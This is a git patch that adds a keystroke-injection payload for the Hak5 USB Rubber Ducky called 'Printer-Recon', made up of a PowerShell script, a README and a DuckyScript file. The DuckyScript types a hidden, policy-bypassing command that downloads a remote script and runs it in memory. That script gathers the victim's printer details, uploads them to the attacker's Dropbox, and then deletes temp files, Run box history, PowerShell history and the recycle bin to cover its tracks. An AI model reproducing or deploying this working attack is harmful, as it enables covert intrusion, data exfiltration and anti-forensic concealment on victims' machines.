From e8e2103c363f9abe53aea8596b78ac12e6f12763 Mon Sep 17 00:00:00 2001 From: atomic <75549184+atomiczsec@users.noreply.github.com> Date: Mon, 14 Nov 2022 22:41:01 -0500 Subject: [PATCH] Add files via upload --- .../library/exfiltration/Printer-Recon/PR.ps1 | 49 +++++++++ .../exfiltration/Printer-Recon/README.md | 104 ++++++++++++++++++ .../exfiltration/Printer-Recon/payload.txt | 16 +++ 3 files changed, 169 insertions(+) create mode 100644 payloads/library/exfiltration/Printer-Recon/PR.ps1 create mode 100644 payloads/library/exfiltration/Printer-Recon/README.md create mode 100644 payloads/library/exfiltration/Printer-Recon/payload.txt diff --git a/payloads/library/exfiltration/Printer-Recon/PR.ps1 b/payloads/library/exfiltration/Printer-Recon/PR.ps1 new file mode 100644 index 00000000..98155adf --- /dev/null +++ b/payloads/library/exfiltration/Printer-Recon/PR.ps1 @@ -0,0 +1,49 @@ +function DropBox-Upload { + +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $DropBoxAccessToken +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +function Clean-Exfil { + +# empty temp folder +rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue + +# delete run box history +reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f + +# Delete powershell history +Remove-Item (Get-PSreadlineOption).HistorySavePath + +# Empty recycle bin +Clear-RecycleBin -Force -ErrorAction SilentlyContinue + +} + +$F1 = "$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt" + +Get-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1 + +DropBox-Upload -f $F1 + +Clean-Exfil + + + + + diff --git a/payloads/library/exfiltration/Printer-Recon/README.md b/payloads/library/exfiltration/Printer-Recon/README.md new file mode 100644 index 00000000..86fc14ee --- /dev/null +++ b/payloads/library/exfiltration/Printer-Recon/README.md @@ -0,0 +1,104 @@ +

+ + + +

+ + +
+ Table of Contents +
    +
  1. Description
    2. +
  2. Getting Started
    3. +
  3. Contributing
    4. +
  4. Version History
    5. +
  5. Contact
    6. +
  6. Acknowledgments
    7. +
+
+ +# Printer-Recon + +## Description + +This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network + +## Getting Started + +### Dependencies + +* DropBox or other file sharing service - Your Shared link for the intended file +* Windows 10 + +

(back to top)

+ +### Executing program + +* Plug in your device +* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory +``` +powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl +``` + +

(back to top)

+ +## Contributing + +All contributors names will be listed here + +atomiczsec + +I am Jakoby + +

(back to top)

+ +## Version History + +* 0.1 + * Initial Release + +

(back to top)

+ + +## Contact + +

📱 My Socials 📱

+
+ + + + + + +
+ + C# + +
YouTube + 		+ + Python + +
Twitter + 		+ + Jsonnet + +
I-Am-Jakoby's Discord +
+
+ +

(back to top)

+ + + + +

(back to top)

+ + +## Acknowledgments + +* [Hak5](https://hak5.org/) +* [I-Am-Jakoby](https://github.com/I-Am-Jakoby) + +

(back to top)

diff --git a/payloads/library/exfiltration/Printer-Recon/payload.txt b/payloads/library/exfiltration/Printer-Recon/payload.txt new file mode 100644 index 00000000..306a2677 --- /dev/null +++ b/payloads/library/exfiltration/Printer-Recon/payload.txt @@ -0,0 +1,16 @@ +REM Title: Printer-Recon + +REM Author: atomiczsec + +REM Description: This payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network + +REM Target: Windows 10 + +DELAY 2000 +GUI r +DELAY 500 +STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl +ENTER + +REM Remember to replace the link with your DropBox shared link for the intended file to download +REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1